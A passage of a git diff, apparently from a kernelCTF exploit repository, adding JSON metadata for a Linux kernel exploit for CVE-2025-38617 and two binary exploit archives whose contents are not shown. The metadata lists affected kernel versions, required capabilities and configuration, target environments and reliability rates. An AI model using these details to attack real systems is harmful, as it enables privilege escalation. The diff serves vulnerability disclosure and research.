"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36", + "affected_versions": ["2.6.12 - 6.16"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_RAW"], + "kernel_config": [ + "CONFIG_PACKET" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "environment": "mitigation-v4-6.6", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes" : "60% - 90%. Fail mostly due to 60 seconds runtime pull request check" + }, + "cos-109-17800.519.41": { + "environment": "cos-109-17800.519.41", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes" : "10% - 70%. Exploit is optimized for mitigation instance. Do not use this exploit strategy on normal instance" + } + } + } diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz new file mode 100644 index 000000000..ff53a60c1 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz new file mode 100644 index 000000000..6047da6a7 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz differ